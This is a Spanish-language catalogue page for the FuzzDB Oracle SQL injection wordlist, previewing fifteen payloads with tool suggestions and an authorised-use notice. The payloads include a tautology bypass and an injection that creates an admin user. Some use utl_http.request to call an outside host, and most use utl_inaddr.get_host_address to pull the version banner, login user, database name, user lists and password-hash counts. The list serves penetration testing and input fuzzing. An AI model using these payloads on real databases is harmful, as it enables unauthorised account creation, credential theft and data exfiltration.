FuzzDB Oracle SQL Injection Detection
Payloads de detección de inyección SQL específicos de Oracle y de tipo out-of-band que aprovechan utl_http, utl_inaddr.get_host_address y consultas al catálogo SYS para pruebas basadas en errores y de exfiltración.
- Tamaño
- 7.8 KB
- Categoría
- Fuzzing
- Fuente
- fuzzdb-project/fuzzdb
- Licencia
- GPLv2
- Herramientas recomendadas
- sqlmapffufburp
Vista previa
Las primeras 15 entradas. Descarga o copia la lista completa (7.8 KB) con los botones de arriba.
’ or ‘1’=’1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='iPayloads de detección de inyección SQL específicos de Oracle y de tipo out-of-band que aprovechan utl_http, utl_inaddr.get_host_address y consultas al catálogo SYS para pruebas basadas en errores y de exfiltración.
Esta lista está orientada al fuzzing de entradas y al descubrimiento de vulnerabilidades. Contiene aproximadamente 7.8 KB y combina bien con herramientas como sqlmap, ffuf, burp. Elige la lista más pequeña que se ajuste a tu engagement: las listas más cortas son más rápidas y silenciosas para los ataques en línea, mientras que las listas más grandes ofrecen una cobertura más amplia para el trabajo sin conexión, donde la velocidad supone menos limitación.
Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a
tu portapapeles o descargar el archivo .txt en bruto. La lista completa se sirve directamente
desde su fuente original en GitHub.
Obtenido de fuzzdb-project/fuzzdb y distribuido bajo GPLv2. Utiliza las listas de palabras únicamente contra sistemas que tengas autorización explícita para probar.